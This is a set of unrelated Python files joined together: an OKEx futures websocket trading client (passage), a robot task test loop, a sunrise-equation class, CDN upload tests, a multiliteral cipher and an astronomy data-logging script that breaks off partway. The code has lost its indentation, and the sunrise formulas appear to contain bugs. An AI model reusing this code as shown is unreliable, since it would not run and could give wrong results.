self.methods[Constants.OKEX_FUTURE_TRADE_WS] = self.update_trade
self.methods[Constants.OKEX_FUTURE_DELETE_ORDER_WS] = self.update_trade
self.methods[Constants.OKEX_FUTURE_GET_ORDER_WS] = self.update_get_order
self.methods[Constants.OKEX_FUTURE_USERINFO_WS] = self.update_get_account
def remove_callbacks(self):
# del self.methods[self.depth_channel]
del self.methods[Constants.OKEX_FUTURE_LOGIN]
del self.methods[Constants.OKEX_FUTURE_TRADE_WS]
del self.methods[Constants.OKEX_FUTURE_DELETE_ORDER_WS]
del self.methods[Constants.OKEX_FUTURE_GET_ORDER_WS]
del self.methods[Constants.OKEX_FUTURE_USERINFO_WS]
def getDepth(self):
self.update({"depth": False})
return self.depth
def get_ticker(self):
self.update({'ticker': False})
return self.ticker
def get_trades(self):
self.update({'trades': False})
return self.trades
def get_index_price(self):
self.update({'index_price': False})
return self.index_price
async def sub_position(self, data):
# print(data)
symbol = data[0]['data']['symbol']
for side in data[0]['data']['positions']:
position = self.contract_type[side['position']]
key = symbol + '_' + position + '_position'
hold_amount = side['hold_amount']
self.position[key] = hold_amount
async def sub_trades(self, sub_trades):
'''
:param sub_trades:
:return: {15411968317: {'lever_rate': 10.0, 'amount': 1.0, 'orderid': 15411968317, 'contract_id': 20171215013, 'fee': 0.0, 'contract_name': 'BTC1215', 'unit_amount': 100.0, 'price_avg': 0.0, 'type': 1, 'deal_amount': 0.0, 'contract_type': 'this_week', 'user_id': 6240992, 'system_type': 0, 'price': 16500.0, 'create_date_str': '2017-12-11 17:02:18', 'create_date': 1512982938351, 'status': 0}, 15411968630: {'lever_rate': 10.0, 'amount': 1.0, 'orderid': 15411968630, 'contract_id': 20171215013, 'fee': 0.0, 'contract_name': 'BTC1215', 'unit_amount': 100.0, 'price_avg': 0.0, 'type': 1, 'deal_amount': 0.0, 'contract_type': 'this_week', 'user_id': 6240992, 'system_type': 0, 'price': 16500.0, 'create_date_str': '2017-12-11 17:02:18', 'create_date': 1512982938625, 'status': 0}}
'''
# print('sub_trades', sub_trades)
# doc 中 orderid 和 order_id都有,实际返回只有orderid
logger.info("sub_trades: %s" % sub_trades)
order_id = sub_trades[0]["data"]['orderid']
price = sub_trades[0]["data"]['price']
price_avg = sub_trades[0]["data"]['price_avg']
status = sub_trades[0]["data"]['status']
amount = sub_trades[0]["data"]['amount']
deal_amount = sub_trades[0]["data"]['deal_amount']
trade_pair = sub_trades[0]["data"]['contract_name'] + '_' + sub_trades[0]["data"]['contract_type']
order_time = sub_trades[0]["data"]['create_date']
side = self.order_type[sub_trades[0]["data"]['type']]
# account_id = sub_trades[0]["data"]['user_id']
# 成交或者部分成交
if status == 2 or status == 1:
if order_id in self.unique_active_orders:
last_amount_filled = self.unique_active_orders[order_id]['amount_filled']
if deal_amount <= last_amount_filled:
return
message = {'order_id': order_id,
'amount_orig': amount,
'amount_filled': deal_amount,
'message_type': 'order update',
'side': side}
self.unique_active_orders[order_id] = message
logger.debug("OKEXFuture q_order_result: %s" % message)
self.q_order_result.put(message)
# 成交或者撤单成功, 记入历史订单
if status == 2 or status == -1:
try:
if status == 2 or (status == -1 and deal_amount):
data_store = Util.build_order_store(order_id=order_id,
side=side,
amount_filled=deal_amount,
time_stamp=order_time,
trade_pair=trade_pair,
price=price_avg or price,
client_order_id=0,
platform_name='okex_future',
platform_account_id=self.okex_id,
strategy_id=self.strategy_id,
fee_rate=self.fee_rate)
self.q_orders.put(data_store)
if status == -1:
side = 'delete'
else:
side = self.order_type[sub_trades[0]["data"]['type']]
self.hist[side][order_id] = sub_trades[0]["data"]
if len(self.hist[side]) > self.hist_lenth:
self.hist[side].popitem(last=False)
except Exception as ex:
logger.error('OKEX Future: sub_trades %s' % ex)
async def login(self, data):
if data[0]['data']['result'] is True:
self.update_flags['login'] = True
async def update_depth(self, depth_data):
try:
list_of_ask = self.okex_depth_format(depth_data[0]["data"], "asks")
list_of_bid = self.okex_depth_format(depth_data[0]["data"], "bids")
self.depth = {"asks": list_of_ask, 'bids': list_of_bid}
# message = {'bid_price': list_of_bid[0]['price'], 'message_type': 'depth update'}
DepthIndexTrigger.Q_TRIGGER.put({"asks": list_of_ask, 'bids': list_of_bid, "name": self.name})
self.update_flags["depth"] = True
except Exception as ex:
self.error('OKEXFuture update_depth got: %s' % depth_data)
async def update_ticker(self, ticker_data):
self.ticker = ticker_data
self.update_flags['ticker'] = True
async def update_trades(self, trades_data):
self.trades = [{'tid': t[0], 'price': t[1], 'amount': t[2], 'time': t[3], 'type': t[4]} for t in trades_data[0]['data']]
self.update_flags['trades'] = True
async def update_index_price(self, index_data):
self.index_price = index_data[0]['data']
self.index_price["futureIndex"] = float(self.index_price["futureIndex"])
self.index_price.update({"name": "{}_index".format(self.name)})
DepthIndexTrigger.Q_TRIGGER.put(self.index_price)
self.update_flags['index_price'] = True
async def update_trade(self, trade_data):
'''
:param trade_data: [{'data': {'result': True, 'order_id': 14420556515}, 'channel': 'ok_futuresusd_trade'}]
:return: {'result': True, 'order_id': 14420556515}
'''
if trade_data[0]["data"]['result'] is True:
self.trade = trade_data[0]["data"]
else:
if trade_data[0]["data"]['error_code'] != 20015: # 订单已成交
logger.error('Order err %s' %(trade_data[0]["data"]['error_code']))
self.update_flags['trade'] = True
async def update_get_order(self, order_data):
'''
:param order_data: [{'data': {'result': True, 'orders': [{'symbol': 'eth_usd', 'lever_rate': 10.0, 'amount': 1.0, 'fee': 0.0, 'contract_name': 'ETH1201', 'unit_amount': 10.0, 'type': 2, 'price_avg': 0.0, 'deal_amount': 0.0, 'price': 450.0, 'create_date': 1512029722000, 'order_id': 14495541683, 'status': -1}]}, 'channel': 'ok_futureusd_orderinfo'}]
:return: {'result': True, 'orders': [{'symbol': 'eth_usd', 'lever_rate': 10.0, 'amount': 1.0, 'fee': 0.0, 'contract_name': 'ETH1201', 'unit_amount': 10.0, 'type': 2, 'price_avg': 0.0, 'deal_amount': 0.0, 'price': 450.0, 'create_date': 1512029722000, 'order_id': 14495541683, 'status': -1}]}
'''
self.order = order_data[0]["data"]
self.update_flags['get_order'] = True
async def update_get_account(self, account_data):
'''
:param account_data: [{'data': {'result': True, 'info': {'btc': {'balance': 0.0, 'rights': 0.0, 'contracts': []}, 'etc': {'balance': 0.0, 'rights': 0.0, 'contracts': []}, 'bch': {'balance': 0.0, 'rights': 0.0, 'contracts': []}, 'eth': {'balance': 0.10016739, 'rights': 0.10016739, 'contracts': [{'contract_type': 'this_week', 'freeze': 0.0, 'balance': 5.058e-05, 'contract_id': 20171208260, 'available': 0.10016739, 'profit': -5.058e-05, 'bond': 0.0, 'unprofit': 0.0}]}, 'ltc': {'balance': 0.0, 'rights': 0.0, 'contracts': []}}}, 'channel': 'ok_futureusd_userinfo'}]
:return:
'''
if account_data[0]["data"]['result'] is True:
self.account = account_data[0]["data"]['info']
self.update_flags['get_account'] = True
def update(self, flags):
'''
:param flags: {"depth": True, 'trade': False}
:return:
'''
self.unset_flags(flags)
self.register_callbacks()
timeout = self.timeout
start = time.time()
while True:
time.sleep(0.001)
if (self.check_flags(flags)):
break
if time.time() - start > timeout:
raise TimeoutError
self.remove_callbacks()
return self
def long(self, amount, price=-1, lever_rate='10'):
logger.debug("OKEXFuture Long: %s @%s, lever_rate=%s" % (amount, price, lever_rate))
message = self.build_message(price=price, amount=amount, type='1', lever_rate=lever_rate, channel=Constants.OKEX_FUTURE_TRADE_WS)
# asyncio.Queue is not thread safe
self.loop.call_soon_threadsafe(self.q.put_nowait, message)
self.update({'trade': False})
logger.debug("OKEXFuture Long Result: %s" % self.trade)
return self.trade
def short(self, amount, price=-1, lever_rate='10'):
logger.debug("OKEXFuture Short: %s @%s, lever_rate=%s" % (amount, price, lever_rate))
message = self.build_message(price=price, amount=amount, type='2', lever_rate=lever_rate, channel=Constants.OKEX_FUTURE_TRADE_WS)
self.loop.call_soon_threadsafe(self.q.put_nowait, message)
self.update({'trade': False})
logger.debug("OKEXFuture Short Result: %s" % self.trade)
return self.trade
def closeLong(self, amount, price=-1):
logger.debug("OKEXFuture closeLong: %s @%s" % (amount, price))
message = self.build_message(price=price, amount=amount, type='3', channel=Constants.OKEX_FUTURE_TRADE_WS)
self.loop.call_soon_threadsafe(self.q.put_nowait, message)
self.update({'trade': False})
logger.debug("OKEXFuture closeLong Result: %s" % self.trade)
return self.trade
def closeShort(self, amount, price=-1):
logger.debug("OKEXFuture closeShort: %s @%s" % (amount, price))
message = self.build_message(price=price, amount=amount, type='4', channel=Constants.OKEX_FUTURE_TRADE_WS)
self.loop.call_soon_threadsafe(self.q.put_nowait, message)
self.update({'trade': False})
logger.debug("OKEXFuture closeShort Result: %s" % self.trade)
return self.trade
def deleteOrder(self, order_id, tillOK=True):
'''
:param order_id:
:return: {'result': True, 'order_id': '14435081666'}
status(int): 订单状态(0等待成交 1部分成交 2全部成交 -1撤单 4撤单处理中)
'''
logger.debug("OKEXFuture deleteOrder: id %s" % order_id)
while True:
try:
message = self.build_message(order_id=order_id, channel=Constants.OKEX_FUTURE_DELETE_ORDER_WS)
self.loop.call_soon_threadsafe(self.q.put_nowait, message)
self.update({'trade': False})
if tillOK:
order = self.getOrder(order_id)
logger.debug("OKEXFuture deleteOrder Result: %s" % order)
if 'status' in order:
status = order['status']
# 仍然在待成交状态,继续cancel order
if status == 0 or status == 1:
logger.error(order)
continue
else:
logger.debug("OKEXFuture deleteOrder Result: %s" % self.trade)
return self.trade
except Exception as e:
self.error("OKEXFuture deleteOrder %s" % e)
if tillOK:
continue
return None
def getOrder(self, order_id=None, tillOK=True):
'''
:param order_id:
:param tillOK:
:return: {'symbol': 'eth_usd', 'lever_rate': 10.0, 'amount': 1.0, 'fee': 0.0, 'contract_name': 'ETH1201', 'unit_amount': 10.0, 'type': 2, 'price_avg': 0.0, 'deal_amount': 0.0, 'price': 450.0, 'create_date': 1512029722000, 'order_id': 14495541683, 'status': -1}
:return:{15411968317: {'lever_rate': 10.0, 'amount': 1.0, 'orderid': 15411968317, 'contract_id': 20171215013, 'fee': 0.0, 'contract_name': 'BTC1215', 'unit_amount': 100.0, 'price_avg': 0.0, 'type': 1, 'deal_amount': 0.0, 'contract_type': 'this_week', 'user_id': 6240992, 'system_type': 0, 'price': 16500.0, 'create_date_str': '2017-12-11 17:02:18', 'create_date': 1512982938351, 'status': 0}, 15411968630: {'lever_rate': 10.0, 'amount': 1.0, 'orderid': 15411968630, 'contract_id': 20171215013, 'fee': 0.0, 'contract_name': 'BTC1215', 'unit_amount': 100.0, 'price_avg': 0.0, 'type': 1, 'deal_amount': 0.0, 'contract_type': 'this_week', 'user_id': 6240992, 'system_type': 0, 'price': 16500.0, 'create_date_str': '2017-12-11 17:02:18', 'create_date': 1512982938625, 'status': 0}}
'''
if order_id:
while True:
try:
# message = self.build_message(channel=Constants.OKEX_FUTURE_GET_HIST_WS)
message = self.build_message(order_id=order_id, channel=Constants.OKEX_FUTURE_GET_ORDER_WS)
self.loop.call_soon_threadsafe(self.q.put_nowait, message)
self.update({'get_order': False})
order = self.order
if 'result' in order:
if order['result'] is True:
order['orders'][0]['type'] = self.order_type[int(order['orders'][0]['type'])]
return order['orders'][0] if order['orders'] else None
if tillOK:
continue
else:
logger.error(order)
break
except Exception as e:
self.error("OKEXFuture getOrder %s" % e)
if tillOK:
continue
return None
else:
message = self.build_message(order_id='-1', status='1', current_page='1', page_length='50', channel=Constants.OKEX_FUTURE_GET_ORDER_WS)
self.loop.call_soon_threadsafe(self.q.put_nowait, message)
self.update({'get_order': False})
active_order = {}
orders = self.order
for order in orders["orders"]:
order_id = order['order_id']
active_order[order_id] = order
return active_order
def getAccount(self, coin=[]):
message = self.build_message(channel=Constants.OKEX_FUTURE_USERINFO_WS)
self.loop.call_soon_threadsafe(self.q.put_nowait, message)
self.update({'get_account': False})
try:
if coin:
ret = {}
for c in coin:
if c.lower() in self.account:
ret[c.lower()] = self.account[c.lower()]
else:
ret[c.lower()] = {'balance': 0.0, 'rights': 0.0, 'contracts': []}
return ret
else:
return self.account
except Exception as ex:
self.error("OKEXFuture getAccount %s" % ex)
async def send(self):
# 等待登录
await asyncio.sleep(1)
while True:
message = await self.q.get()
await self.websocket.send(message)
def getHist(self):
return self.hist
def build_message(self, channel, event='addChannel', **kwargs):
'''
:param channel: subscribe channel
:param event: default 'addChannel'
:param kwargs: parameters
:return:
'''
params = {}
# 删除订单/获取订单
if channel is Constants.OKEX_FUTURE_DELETE_ORDER_WS or channel is Constants.OKEX_FUTURE_GET_ORDER_WS:
order_id = kwargs.get('order_id')
status = kwargs.get('status', None)
params = {'api_key': self.apikey, 'symbol': self.symbol, 'contract_type': self.contract_type, 'order_id': order_id}
if status:
params['status'] = status
params['current_page'] = kwargs.get('current_page', None)
params['page_length'] = kwargs.get('page_length', None)
# 下单
elif channel is Constants.OKEX_FUTURE_TRADE_WS:
params = {'api_key': self.apikey, 'symbol': self.symbol, 'contract_type': self.contract_type,
'amount': str(kwargs.get('amount')), 'type': str(kwargs.get('type')), 'match_price': "1",
'lever_rate': str(kwargs.get('lever_rate', 10))}
price = kwargs.get('price', None)
if price > 0:
params['match_price'] = "0"
params['price'] = str(price)
# 默认参数
else:
params = {'api_key': self.apikey}
params['sign'] = self.buildMySign(params, self.apisec)
message = str({'event': event, 'channel': channel, 'parameters': params})
return message
def buildMySign(self, params, secretKey):
sign = ''
for key in sorted(params.keys()):
sign += key + '=' + str(params[key]) + '&'
return hashlib.md5((sign + 'secret_key=' + secretKey).encode("utf-8")).hexdigest().upper()
def parse_meta(self, meta_code):
meta_table = {
"btc_usd_this_week": ("btc", "usd", "btc_usd", "this_week"),
"btc_usd_next_week": ("btc", "usd", "btc_usd", "next_week"),
"btc_usd_quarter": ("btc", "usd", "btc_usd", "quarter"),
"eth_usd_this_week": ("eth", "usd", "eth_usd", "this_week"),
"eth_usd_next_week": ("eth", "usd", "eth_usd", "next_week"),
"eth_usd_quarter": ("eth", "usd", "eth_usd", "quarter"),
}
return meta_table[meta_code]
async def ws_init(self):
await self.sub_channel()
async def ws_handler(self):
'''
handle task in backthread
:return:
'''
while True:
channel = None
try:
data = await asyncio.wait_for(self.websocket.recv(), timeout=20)
except asyncio.TimeoutError:
# No data in 20 seconds, check the connection.
try:
pong_waiter = await self.websocket.ping()
await asyncio.wait_for(pong_waiter, timeout=10)
except asyncio.TimeoutError:
# No response to ping in 10 seconds, disconnect.
self.error('ws_handler: receive time out')
break
except Exception as ex:
try:
logger.error('ws_handler: %s' % ex)
await self.keep_connect()
await asyncio.sleep(5)
pong_waiter = await self.websocket.ping()
await asyncio.wait_for(pong_waiter, timeout=10)
except asyncio.TimeoutError:
# No response to ping in 10 seconds, disconnect.
break
else:
data = json.loads(data)
# print(data)
channel = data[0].get("channel", None)
if channel in self.methods:
if self.methods[channel] != None:
await self.methods[channel](data)
else:
pass
def run(self):
asyncio.set_event_loop(self.loop)
while True:
try:
self.loop.run_until_complete(self.keep_connect())
self.loop.run_until_complete(self.ws_init())
tasks = [self.ws_handler(), self.send()]
self.loop.run_until_complete(asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED))
time.sleep(1)
except Exception as ex:
self.error(ex)
def test_btc_usd_this_week():
os.environ[Constants.DQUANT_ENV] = "dev"
loop = asyncio.new_event_loop()
ok = OkexFutureWs("btc_usd_this_week", loop)
ok.start()
#print(ok.get_ticker())
#import pdb; pdb.set_trace()
#print(ok.get_ticker())
#print(ok.getDepth())
print(ok.long(amount=1))
#print(ok.getAccount())
def test_btc_usd_quarter():
os.environ[Constants.DQUANT_ENV] = "dev"
loop = asyncio.new_event_loop()
ok = OkexFutureWs("btc_usd_quarter", loop)
ok.start()
#print(ok.get_ticker())
print(ok.get_index_price())
#print(ok.getDepth())
#print(ok.get_trades())
#print(ok.getAccount())
if __name__ == "__main__":
test_btc_usd_quarter()
#test_btc_usd_this_week() |
from collections import OrderedDict, defaultdict
import os
import numpy as np
from env.tasks import HomeServiceTaskSampler, HomeServiceTaskType
from experiments.home_service_base import HomeServiceBaseExperimentConfig
from PIL import Image
import argparse
import torch
import torch.backends.cudnn as cudnn
import pickle
task_sampler_params = HomeServiceBaseExperimentConfig.stagewise_task_sampler_args(
stage="train", process_ind=0, total_processes=1, headless=False
)
task_sampler: HomeServiceTaskSampler = HomeServiceBaseExperimentConfig.make_sampler_fn(
**task_sampler_params,
task_type=HomeServiceTaskType.SIMPLE_PICK_AND_PLACE,
force_cache_reset=True,
epochs=1,
)
num_tasks = 500
success = 0
for i in range(num_tasks):
print(f'{i}-th task')
task = task_sampler.next_task()
print(f' task: {task.env.current_task_spec.task_type}')
# print(f' pickup_target: {task.env.current_task_spec.pickup_target}')
# print(f' place_target: {task.env.current_task_spec.place_target}')
# rgb = task.env.last_event.frame
# depth = task.env.last_event.depth_frame
while not task.is_done():
obs = task.get_observations()
import pdb; pdb.set_trace()
action_ind = int(input(f"action_ind="))
# if task.num_steps_taken() % 10 == 0:
# print(
# f'step: {task.num_steps_taken()}:'
# f' taking action {task.action_names()[action_ind]}'
# )
step_result = task.step(action=action_ind)
# task.greedy_expert.update(
# action_taken=action_ind,
# action_success=step_result.info['action_success']
# )
if step_result.info['action_name'] == "done":
success += 1
# if task.current_subtask[0] == "Done":
# print(f"All subtasks DONE")
# import pdb; pdb.set_trace()
print(f'{i}-th task done')
task_sampler.close()
print(f'finishied {num_tasks} tasks')
print(f'Success {success} out of {num_tasks}')
|
"""
The SunEquation class is used approximately calculate the sunset and
sunrise times using the Sunrise Equation found on Wikipedia.
"""
import math
import logging
# from datetime import datetime, timezone
import datetime
import pytz
from tzlocal import get_localzone
class SunEquation:
"""
Used to calculate sunrise and sunset time for the current day.
Using the full sunrise equation as found on Wikipedia.
https://en.wikipedia.org/wiki/Sunrise_equation
The sunrise and sunset times obtained are accurate to within 5
minutes. #FUTURE: test the accuracy of this theory.
"""
def __init__(self, latitude, longitude):
self.date_today = datetime.date.today()
self.longitude_west = longitude
self.latitude = latitude
self.jdn = None
self.rise = None
self.set = None
self.timezone = None
def calculate(self):
"""
Calculate sunrise and sunset datetime objects based upon
the Wikipedia Sunrise Equation formuale
"""
logging.debug("New day, new calculations")
n = self.current_julian_day()
j_star = self.mean_solar_moon(n, self.longitude_west)
m = self.solar_mean_anomaly(j_star)
c = self.equation_of_the_centre(m)
lam = self.ecliptic_longitude(m, c)
j_transit = self.solar_transit(j_star, m, lam)
theta = self.declination_of_the_sun(lam)
w_o = self.hour_angle(self.latitude, theta)
self.suntimes(j_transit, w_o)
return self.rise, self.set
def current_julian_day(self):
"""
Calculates the current julian calandar day.
Equation:
n = j_date - 2451545.5 + 0.0008
"""
# fmt = '%Y.%m.%d'
# s = '2012.11.07'
# dt = datetime.datetime.strptime
jdn = self.julian_date(
self.date_today.year,
self.date_today.month,
self.date_today.day)
n = jdn - 2451545.0 + 0.0008
logging.debug("Current julain day %s", str(n))
return n
def julian_date(self, year, month, day):
"""
Returns Julian date according to:
"""
self.jdn = ((1461*(year+4800+(month-14)/12))/4
+ (367*(month-2-12*((month-14)/12)))/12
- (3*((year+4900+(month-14)/12)/100))/4
+ day - 32075)
logging.debug("Julian day calculated: %s", str(self.jdn))
return self.jdn
def mean_solar_moon(self, n, longitude_west):
"""
Calculates the mean solar moon,
n = number of days since 1st Jan 2000 from julian_day() output
longitude_west = longitude of an observer on earth with west
negative and east positive.
"""
j_star = n - (longitude_west/360)
logging.debug("Mean solar moon: %s", str(j_star))
return j_star
def solar_mean_anomaly(self, j_star):
"""
Calculates the solar mean anomaly dependent on the j* value
from mean_solar_moon()
j* = mean solar moon
"""
m = (357.5291 + 0.98560028 * j_star) % 360
logging.debug("Solar mean anaomly: %s", str(m))
return m
def equation_of_the_centre(self, m):
"""
Calculates the Equation of the center
"""
c = 1.9148*math.sin(math.radians(m)) \
+ 0.0200*math.sin(math.radians(2*m)) \
+ 0.0003*math.sin(math.radians(3*m))
logging.debug("Equation of the center: %s", str(c))
return c
def ecliptic_longitude(self, m, c):
"""
Calculates the lambda from the ecliptic longitude
"""
lam = (m + c + 180 + 102.9372) % 360
logging.debug("Ecliptic longitude: %s", str(lam))
return lam
def solar_transit(self, j_star, m, lam):
"""
Calculates the solar transient.
"""
j_transit = 2451545.5 + j_star \
+ 0.0053*math.sin(math.radians(m)) \
- 0.0069*math.sin(math.radians(2*lam))
logging.debug("Solar transient: %s", str(j_transit))
return j_transit
def declination_of_the_sun(self, lam):
"""
Calculates the declination of the sun.
"""
theta = math.degrees(
math.asin(
math.sin(math.radians(lam))
* math.sin(math.radians(23.44))))
# theta = degrees(asin(sin(radians(lam))*(sin(radians(23.44)))
logging.debug("Declination of the Sun: %s", str(theta))
return theta
def hour_angle(self, latitude, theta, a=0):
"""
Calculates the Hour angle.
"""
w_o = math.degrees(
math.acos(
(math.sin(
math.radians(-0.83+a)
- math.sin(math.radians(latitude))
* math.sin(math.radians(theta)))
/ (math.cos(
math.radians(latitude))
* math.cos(math.radians(theta))))))
logging.debug("Hour angle: %s", str(w_o))
return w_o
def suntimes(self, j_transit, w_o):
"""
Calculates sunrise time.
"""
j_rise = j_transit - w_o/360
j_set = j_transit + w_o/360
t_rise = j_rise - self.jdn
t_set = j_set - self.jdn
logging.debug("Rise")
rise_temp = self.julian_to_timedelta(t_rise)
logging.debug("Set")
set_temp = self.julian_to_timedelta(t_set)
tz = get_localzone() #Need to replace to reduce dependency by 1
today = datetime.datetime(
datetime.date.today().year,
datetime.date.today().month,
datetime.date.today().day,
hour=0,
tzinfo=pytz.timezone('UTC')
)
self.rise = rise_temp + today
self.set = set_temp + today
self.rise = self.rise.astimezone(tz)
self.set = self.set.astimezone(tz)
self.timezone = tz
logging.debug("Sunrise: %s", self.rise.strftime("%d/%m/%y %H:%M %p %Z"))
logging.debug("Sunrise: %s", self.set.strftime("%d/%m/%y %H:%M %p %Z"))
def julian_to_timedelta(self, julian):
"""
Takes a fraction of a julain day and returns the time as a
datetime element.
"""
# 19/03/01 Removed line below which may be because of NZ Timezone.
# Require further testing
# assert julian < 1
hour = math.floor(julian*24)
minute = math.floor((julian*24-hour)*60)
delta = datetime.timedelta(hours=hour, minutes=minute)
logging.debug("Time Delta: %s", str(delta))
return delta
def format_yaml(self):
"""
Writes date, sunrise and sunset times to a dictionary
following ISO standards. This data can then be written to a
file.
"""
today = datetime.date.today().isoformat()
rise = self.rise.isoformat()
fall = self.set.isoformat()
timezone = self.rise.tzinfo.zone
"""
This is a workaround. Tied to using get_localzone in
suntimes(). Gathering the current timezone some other way
will reduce this dependency.
"""
output = {
"date": today,
"sunrise": rise,
"sunset": fall,
"timezone": timezone,
}
return output
|
import time
import unittest
from cdn_origin.origin import Origin
from cdn_origin.origin_set import OriginSet
class TestOriginSet(unittest.TestCase):
def upload_dummy_1(self, dest_name: str, data: bytes, job_types: str, info: None):
print('upload_dummy_1', dest_name, data, job_types, info)
time.sleep(0.1)
def upload_dummy_2(self, dest_name: str, data: bytes, job_types: str, info: None):
print('upload_dummy_2', dest_name, data, job_types, info)
time.sleep(0.1)
def upload_dummy_3(self, dest_name: str, data: bytes, job_types: str, info: None):
print('upload_dummy_2', dest_name, data, job_types, info)
time.sleep(0.5)
def test_tasks_success(self):
x = OriginSet([Origin(self.upload_dummy_1), Origin(self.upload_dummy_2)])
x.upload('dummy', b'some_data', 'type_a', 'info')
assert(x.wait(0.05) == False)
assert(x.wait(0.09) == True)
assert(x.wait(0.01) == True)
x.close()
def test_one_completed(self):
x = OriginSet([Origin(self.upload_dummy_1), Origin(self.upload_dummy_3)])
x.upload('dummy', b'some_data', 'type_a', 'info')
assert(x.wait(0.05) == False)
assert(x.wait(0.1) == True)
x.close()
|
# -*- coding: UTF-8 -*-
# @File: multiliteral.py
# @Author: SCERush
# @Contact: 1037920609@qq.com
# @Datetime: 20/7/5 17:30
# @Software: PyCharm
"""
文件说明:multiliteral密码
"""
import re
# 字母表
keywordList = "ABCDEFGHIKLMNOPQRSTUVWXYZ"
def removePunctuation(text):
filter = '[^A-Z]'
return re.sub(filter, '', text.upper())
def encrypt(plaintext, key):
"""
主要算法,获取加密字母在二维字母表中的行列值,其密文为与之对应的key中位置的相应字母
:param plaintext:
:param key:
:return:
"""
plain = removePunctuation(plaintext).replace('J', 'I')
key = key.upper()
cipher = ''
for i in range(len(plain)):
row = int(keywordList.index(plain[i]) / 5)
cipher += key[row]
col = keywordList.index(plain[i]) % 5
cipher += key[col]
return cipher
def decrypt(ciphertext, key):
"""
主要算法:对密文两两遍历,找到相应字母在key中的位置,分别对应明文在字母表中的行列
:param ciphertext:
:param key:
:return:
"""
cipher = removePunctuation(ciphertext).replace('J', 'I')
key = key.upper()
plain = ''
for i in range(0, len(cipher), 2):
row = key.index(cipher[i])
col = key.index(cipher[i + 1])
num = row * 5 + col
plain += keywordList[num]
return plain
if __name__ == '__main__':
m = "Multilieral"
key = "codes"
c = encrypt(m, key)
print(c)
d = decrypt(c, key)
print(d)
|
import os
import re
import datetime
import dateutil.parser
import configparser
import numpy as np
import astropy.io.fits as fits
from astropy.table import Table
from ...utils.misc import extract_date
from ..common import load_obslog, load_config
from .common import print_wrapper, get_ccd_geometry
from .reduce import reduce_feros
def make_config():
"""Generate a config file for reducing the data taken with FEROS.
"""
# find date of data obtained
current_pathname = os.path.basename(os.getcwd())
guess_date = extract_date(current_pathname)
while(True):
if guess_date is None:
prompt = 'YYYYMMDD'
else:
prompt = guess_date
string = input('Date of observation [{}]: '.format(prompt))
input_date = extract_date(string)
if input_date is None:
if guess_date is None:
continue
else:
input_date = guess_date
break
else:
break
input_datetime = datetime.datetime.strptime(input_date, '%Y-%m-%d')
direction = 'yr-'
# general database path for this instrument
dbpath = '~/.gamse/FEROS'
# create config object
config = configparser.ConfigParser()
config.add_section('data')
config.set('data', 'telescope', 'MPG/ESO-2.2m')
config.set('data', 'instrument', 'FEROS')
config.set('data', 'rawpath', 'rawdata')
config.set('data', 'statime_key', 'OBS-DATE')
config.set('data', 'exptime_key', 'EXPTIME')
config.set('data', 'direction', direction)
config.add_section('reduce')
config.set('reduce', 'midpath', 'midproc')
config.set('reduce', 'figpath', 'images')
config.set('reduce', 'odspath', 'onedspec')
config.set('reduce', 'mode', 'normal')
config.set('reduce', 'oned_suffix', 'ods')
config.set('reduce', 'fig_format', 'png')
config.set('reduce', 'ncores', 'max')
# section of bias correction
sectname = 'reduce.bias'
config.add_section(sectname)
config.set(sectname, 'bias_file', '${reduce:midpath}/bias.fits')
config.set(sectname, 'cosmic_clip', str(10))
config.set(sectname, 'maxiter', str(5))
config.set(sectname, 'smooth', 'yes')
config.set(sectname, 'smooth_method', 'gaussian')
config.set(sectname, 'smooth_sigma', str(3))
config.set(sectname, 'smooth_mode', 'nearest')
# section of order trace
sectname = 'reduce.trace'
config.add_section(sectname)
config.set(sectname, 'minimum', str(8))
config.set(sectname, 'scan_step', str(100))
config.set(sectname, 'separation', '500:20, 1500:30, 3500:52')
config.set(sectname, 'filling', str(0.3))
config.set(sectname, 'align_deg', str(2))
config.set(sectname, 'display', 'no')
config.set(sectname, 'degree', str(3))
# write to config file
filename = 'FEROS.{}.cfg'.format(input_date)
outfile = open(filename, 'w')
for section in config.sections():
maxkeylen = max([len(key) for key in config[section].keys()])
outfile.write('[{}]'.format(section)+os.linesep)
fmt = '{{:{}s}} = {{}}'.format(maxkeylen)
for key, value in config[section].items():
outfile.write(fmt.format(key, value)+os.linesep)
outfile.write(os.linesep)
outfile.close()
print('Config file written to {}'.format(filename))
def make_obslog():
"""Scan the raw data, and generated a log file containing the detail
information for each frame.
"""
# load config file
config = load_config('FEROS\S*\.cfg$')
rawpath = config['data'].get('rawpath')
# scan the raw files
fname_lst = sorted(os.listdir(rawpath))
# prepare logtable
logtable = Table(dtype=[
('frameid', 'i4'),
('fileid', 'S23'),
('imgtype', 'S3'),
('datatype','S11'),
('object', 'S15'),
('exptime', 'f4'),
('binning', 'S6'),
('nsat', 'i4'),
('q95', 'i4'),
])
# filename pattern
pattern = 'FEROS\.\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}\.fits'
# start scanning the raw files
frameid = 0
for fname in fname_lst:
if not re.match(pattern, fname):
continue
fileid = fname[6:29]
filename = os.path.join(rawpath, fname)
data, head = fits.getdata(filename, header=True)
obsdate = dateutil.parser.parse(head['DATE-OBS'])
exptime = head['EXPTIME']
objectname = head['OBJECT']
datatype = head['ESO DPR TYPE']
if datatype.split(',')[0]=='OBJECT':
imgtype = 'sci'
else:
imgtype = 'cal'
# find the binning factor
_, _, binx, biny = get_ccd_geometry(head)
binning = '({:d}, {:d})'.format(binx, binx)
# determine the total number of saturated pixels
saturation = (data>=65535).sum()
# find the 95% quantile
quantile95 = int(np.round(np.percentile(data, 95)))
item = [frameid, fileid, imgtype, datatype, objectname, exptime,
binning, saturation, quantile95]
logtable.add_row(item)
item = logtable[-1]
# print log item with colors
string_lst = [
' {:>5s}'.format('[{:d}]'.format(frameid)),
' {:23s}'.format(fileid),
' ({:3s})'.format(imgtype),
' {:11s}'.format(datatype),
' {:15s}'.format(objectname),
' Texp = {:4g}'.format(exptime),
' Binning = {:5s}'.format(binning),
' Nsat = {:6d}'.format(saturation),
' Q95 = {:5d}'.format(quantile95),
]
string = ''.join(string_lst)
print(print_wrapper(string, item))
frameid += 1
# determine filename of logtable.
# use the obsdate of the first frame
obsdate = logtable[0]['fileid'][0:10]
outname = '{}.obslog'.format(obsdate)
if os.path.exists(outname):
i = 0
while(True):
i += 1
outname = '{}.{}.obslog'.format(obsdate, i)
if not os.path.exists(outname):
outfilename = outname
break
else:
outfilename = outname
# set display formats
logtable['imgtype'].info.format = '^s'
logtable['datatype'].info.format = '<s'
logtable['object'].info.format = '<s'
